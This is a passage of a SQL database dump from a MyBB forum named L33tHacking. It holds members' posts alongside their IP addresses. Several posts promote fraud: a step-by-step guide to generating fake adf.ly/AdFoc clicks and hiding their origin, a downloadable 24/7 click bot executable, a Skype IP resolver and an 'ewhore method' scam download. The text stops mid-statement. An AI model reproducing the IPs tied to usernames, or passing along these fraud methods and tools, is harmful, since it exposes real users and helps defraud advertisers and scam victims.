'039daed94067505b3789c78ff179a203', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5388', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '82', 'iTzIpod', '1350593476', 'I actually saw a couple of these on Youtube already.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1dc9cb3d393dde4d1993f2deec920383', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5389', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '82', 'iTzIpod', '1350593604', 'You gotta for your spelling and grammar. You sometimes made LQ posts in the past.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9e2a4483f950375dd01eb52c96fd24d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5390', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '228', 'VirtualLegend', '1350593634', 'This Man is Awesome', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '98d7ad926ceb9e32386fbcc0cce67a2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5391', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '82', 'iTzIpod', '1350593653', 'Seems legit. Will check it out. Which one is the best? In your opinion?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9aaede89972f399edee9b39f2a15d188', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5392', '816', '4276', '9', 'RE: | Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '0', '82', 'iTzIpod', '1350593833', 'customhits.net is a Traffic Exchange website I use.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e44fbd1a42ed3d443b993a21829152b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5393', '930', '5389', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350593841', '[quote=\'iTzIpod\' pid=\'5389\' dateline=\'1350593604\'] You gotta for your spelling and grammar. You sometimes made LQ posts in the past. [/quote] really! sorry for that, i used to do that when i was a noob:O', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '03860e20555fd5c378712fbdc5c7d542', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5394', '910', '5021', '49', 'RE: Referral Contest?', '0', '82', 'iTzIpod', '1350593867', 'And hopefully they\'re active :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '47190b240d12a3ccbe07f8c23652756c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5395', '816', '4276', '9', 'RE: | Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '0', '257', 'XxTREYZxX', '1350593906', 'thanks for the great list, appreciated much :)', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'f93440485f10200cbd05045d359384dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5396', '939', '5267', '49', 'RE: a contest', '0', '82', 'iTzIpod', '1350593919', 'Can you fix your grammar? Um. Yeah t3h jok3r gave away too much Upgrades for free. That\'s my opinion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5bfeef3b7314ff429414af441a861365', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5397', '958', '5387', '73', 'RE: subway surfers', '0', '62', 'R?????zo?', '1350593961', 'Nice cheats, thanks for this bro.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '99e3176ad3cb41b5829b1848bc2eaeca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5398', '921', '5120', '4', 'RE: Hey', '0', '82', 'iTzIpod', '1350593964', 'Welcome to L33tHacking bro. Enjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '69bf1c8e8f7dd597af2ee00a62043d91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5399', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350594007', 'Nice job L33tHacking. A lot of members became more active now :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7f3577a10b7405d62129aa6ec4b7edb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5400', '957', '5386', '9', 'RE: | [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '62', 'R?????zo?', '1350594119', 'Looks great, thanks for sharing bro :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '70ef8f77f1dd12b9dbb135dead224c22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5401', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '82', 'iTzIpod', '1350594124', 'I want a MC account :3 xD I already have one. But I got a friend that is being cheap and won\'t buy one from me. So I\'ll give him this one for free.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8cb4b42a33364c0958b3ce3ccee1a057', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5402', '496', '2408', '14', 'RE: Free Proxy List', '0', '214', 'Rave™', '1350594126', 'I\'d like the list too <3 [code] [/code]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '11668c61f2f78ab41c9dc6b7b95abd96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5403', '958', '5387', '73', 'RE: subway surfers', '0', '257', 'XxTREYZxX', '1350594151', 'no worries hoped i helped you, and enjoy :)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '56d5598fdd9f36652d23b73aec6e1bdb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5404', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '82', 'iTzIpod', '1350594166', 'Ayeee Sexy Lady Ooop Ooop Ooop Oppa Gangnam Style.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b46fbd738d0fb63fd6efd97340f1276c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5405', '959', '0', '9', 'How to make $50+ / Day with AdFoc or Adfly', '0', '62', 'R?????zo?', '1350594167', 'Hey guys, Just a quick 5 min tutorial on how to make $50 + a day with AdFoc / adfly cause I\'ve seen people using it a lot on my traffic exchange. 1. If you\'re not already then sign up to AdFoc / Adfly 2. Create some links (as many as you want, the more links the more money you make) 3. Sign up to http://customhits.net/ 4. You start with 50 coins so go to \"Add Site\", select traffic exchange and fill in the boxes \"title\" \"link\" etc. Now when for the coins section type in how many coins you have and for CPC put the most you can. 5. Now you will need to earn coins to be able to keep your links. To do this just go to earn coins - auto-surf. All you have to do is leave it running in another tab and you\'ll be earning coins. You can set this up to run 24/7 on a VPS 6. To add more coins to your sites just go to My Sites - Your site - Add Coins and put in all of your coins 7. I made $25 doing this yesterday with only 3 links submitted. If I had 6 submitted I would of made $50. This is all good however AdFoc / Adfly will notice where all your hits are coming from so you will need to upgrade to VIP which lets you use anonymous source [all advertisers safe] traffic and they will never know! I hope you like this guide!', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7c3c6e2062b8de5319d94f20002beca9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5406', '947', '5404', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350594213', '[quote=\'iTzIpod\' pid=\'5404\' dateline=\'1350594166\'] Ayeee Sexy Lady Ooop Ooop Ooop Oppa Gangnam Style. [/quote] ahahah every one now op op op op op gangnam style>', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'e9cce736c9bda1d1630fbd8bc9d49d1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5407', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '82', 'iTzIpod', '1350594227', 'Where is the link or whatever?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e1fa384404b1a71b14a6dcfbca1df553', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5408', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '257', 'XxTREYZxX', '1350594268', 'nice tutorial it really helped me :O', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'eff3fdd5009bcc638aaebef567e4dc4d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5409', '943', '5401', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '257', 'XxTREYZxX', '1350594323', '[quote=\'iTzIpod\' pid=\'5401\' dateline=\'1350594124\'] I want a MC account :3 xD I already have one. But I got a friend that is being cheap and won\'t buy one from me. So I\'ll give him this one for free. [/quote] pm me please .thanks :O', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'b75d1a8cf4a308f63c628e82c1e6482a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5410', '960', '0', '61', '[24-7 Traffic Bot] Adf.ly | Adfoc.us | LinkBucks | Traffic Exchange | All in One Bot!', '0', '62', 'R?????zo?', '1350594377', '[align=center][img]http://i.imgur.com/ne7k6.png[/img] [img]http://i.imgur.com/sXB98.png[/img] DOWNLOAD: http://dl.dropbox.com/u/11776598/247Installer.exe [b]TERMS AND CONDITIONS[/b] 1) You will not, and cannot re-distribute my bot under a survey link at all! 2) No clamming this bot as your own creation. Seriously, whos gonna believe you? 3) Just dont do anything stupid. Thanks [b]Virus Scan: [/b] https://www.virustotal.com/file/b557fe3b7be0ecc59d1b79cac7cee68a0389ebc49d812e99f70aaf9c34d88211/analysis/1349572839/ [b]Information:[/b] Designed, and created by 0BliVi0N. This bot is everything, but ordinary! Instead of just delivering views, and hits. It delivers them NON STOP 24-7, and you can get link clicks for adf.ly, linkbucks, adcrun.ch, and more! All it takes is a simple download. And the requirements met. Created in 2011, this was saught to be the best traffic bot. But was discontinued, for new ideas, and further upgraded. Now that its back in action and ready to roll, with ALL NEW FEATURES! This bot can take on the competition, and crush it! All it needs, is your help... Supported Websites: Adf.ly Adchrun.ch LinkBucks Adfoc.us Features: 24-7 View Delivery Auto Start Setting Auto Login Setting Mozilla & IE Browsers Link Clicking (adf.ly, linkbucks, etc) Managing your URLs Settings for only 24 hour link clicking Referrals Traffic Exchanges & MORE! System Requirements: 1GB of RAM Windows 7/Vista/XP .NET Framework 4.0 [/align]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '020f6d3c12aa3737b2cbbbc3dee62d91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5411', '945', '5288', '7', 'RE: I dont want.......', '0', '82', 'iTzIpod', '1350594418', 'We only bent the rule a little bit. That was only to improve LH\'s activity. But we got enough posts for now. So we should report any threads with a PM me for download or whatsoever now. That\'s my opinion of the story.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2822f6f945ecd2733e0a4338e46d5f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5412', '953', '5367', '34', 'RE: | [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '82', 'iTzIpod', '1350594460', 'I knew most of these websites. Although nice share :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '75003e46a8f3967a36439ac095f943fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5413', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1350594461', 'we still need more though, because im so active i get bored with no new post :)', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'e61e08566c7937a6f8fa539f8f6d9340', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5414', '945', '5411', '7', 'RE: I dont want.......', '0', '257', 'XxTREYZxX', '1350594527', '[quote=\'iTzIpod\' pid=\'5411\' dateline=\'1350594418\'] We only bent the rule a little bit. That was only to improve LH\'s activity. But we got enough posts for now. So we should report any threads with a PM me for download or whatsoever now. That\'s my opinion of the story. [/quote] agreed, this guy knows what he is talking about :)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '06e97703ea42db8a938273b96ff014b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5415', '928', '5194', '49', 'RE: MOTM', '0', '82', 'iTzIpod', '1350594534', 'Apathy, you\'re just too inactive. You need to post more. All everyone asks from you. As for the thread, I think we should do this. And a LH Weekly News Series.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c8e5aa2a1749502f681da5aac4fc32cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5416', '950', '5349', '35', 'RE: Which theme do you like better?', '0', '82', 'iTzIpod', '1350594591', 'I like the 2nd one :) Nice job', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '30aba379ba5091ad43400456476d4d7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5417', '928', '5194', '49', 'RE: MOTM', '0', '62', 'R?????zo?', '1350594626', 'I think we should do this, MOTM sounds awesome :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f1d5e48637c0bdcdd3b5c6be05224ec6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5418', '952', '5366', '34', 'RE: A nice clean signature tutorial', '0', '82', 'iTzIpod', '1350594626', 'No he did not. But this is very nice! I like the background. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ead44690488916f720e660b96644317d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5419', '953', '5367', '34', 'RE: | [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '62', 'R?????zo?', '1350594694', 'Nice list, I didn\'t knew most of them :o', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '56c26ee35259a4b705fe4d8b3fedf43f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5420', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1350594703', 'I approve this idea. But I have no experience xP Good luck.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '08e2dc803a66596811180f24e346a723', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5421', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350594754', 'http://l33thacking.net/thread-321.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4185af3d98ddbd6e98d2b5505de73dc9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5422', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '62', 'R?????zo?', '1350594785', '[video=youtube]http://www.youtube.com/watch?v=oIMXL-B_Ax4[/video] Just thought I\'d share this.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '11dfe15596c9c9dd00e4b085330c1c90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5423', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '257', 'XxTREYZxX', '1350594844', 'ahah thanks for this LOL\'d video :O', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'a6b79e1ed55db0bc008b87e0e0a3e8de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5424', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '82', 'iTzIpod', '1350594882', 'He didn\'t download it. I didn\'t download it. I don\'t know how to download it. I can\'t seem to download it. This is 1.3.1 MC Current Version is 1.3.2', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '53841e5f03a2856f2280cf35ad908118', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5425', '961', '0', '61', '??$$[CAN NEVER BE SATURATED] How To Earn $50\\Week! ??', '0', '62', 'R?????zo?', '1350594919', 'About: This eBook will show you a way to make money, and it can never get saturated, and you will never stop earning! Link: http://www.mediafire.com/view/?awvgv5aiay2vrw5', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '92a57e40ba9e7f7dfe311d556635de12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5426', '954', '5371', '35', 'RE: /\\ New Signature | Rate My Graphics !!! /\\', '0', '82', 'iTzIpod', '1350594923', 'Looks alright. Kinda \"blurry\" I guess.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ba735c4bc61647fb47fe11af383560f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5427', '962', '0', '61', '$100/month Ebook', '0', '62', 'R?????zo?', '1350595031', 'You can possibly make $100/month with this eBook. Hope you all enjoy it! Download Link: http://www.mediafire.com/?aw67m3cy1y3yy5a', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9bbe261fda9bc76a67b10ecb589e5d3a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5428', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350595039', 'its on the minecraft map download website and then press download :O', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'd84a515935f98d6b9d76b99077b0e311', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5429', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '82', 'iTzIpod', '1350595088', 'Good luck! Thanks everyone for the support. I should make more threads. But I don\'t have the time.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1002bde65485f9be2beb73a4420b03f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5430', '963', '0', '17', '??SIEGRIED\'S EWHORE METHOD ??', '0', '62', 'R?????zo?', '1350595119', '[align=center] [img]i.imgur.com/uHA8n.jpg[/img] Download: http://dl.dropbox.com/u/57540058/SIEG.FRIED\'S%20EWHORE%20METHOD.zip[/align]', '94.132.244.168', '1585771688', '1', '0', '62', '1350858070', '1', '888f9b9474dfb038b27b950253269d1b', '0', '1350858070'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5431', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '257', 'XxTREYZxX', '1350595171', 'pm\'ed you :) and you should make more threads try get time because they are great:)', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', '7100a6fce1bf142b3aef7adba35ac192', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5432', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '82', 'iTzIpod', '1350595172', 'Are you still a noob? I just asked you to fix your grammar and spelling :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f48986e900e37b0f0c02950905128d67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5433', '964', '0', '19', '[Junk][UPDATED] L33T Hacking Skype Resolver', '0', '214', 'Rave™', '1350595218', '[b] Yes I am back. New source, new API, now working. Enjoy! [/b] http://raveresolver.tk', '71.67.179.16', '1195619088', '1', '0', '214', '1350595230', '1', 'accd1db1e3695fef333e251a17b55bda', '0', '1350595230'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5434', '496', '2408', '14', 'RE: Free Proxy List', '0', '82', 'iTzIpod', '1350595243', 'The list is right there in the thread. If you\'re talking about the bot, okay then. Ask t3h jok3r. Or PM him. Search LH for threads on Adf.ly Bots.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '63a12da2eae11952e7acd26f91ca9f1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, 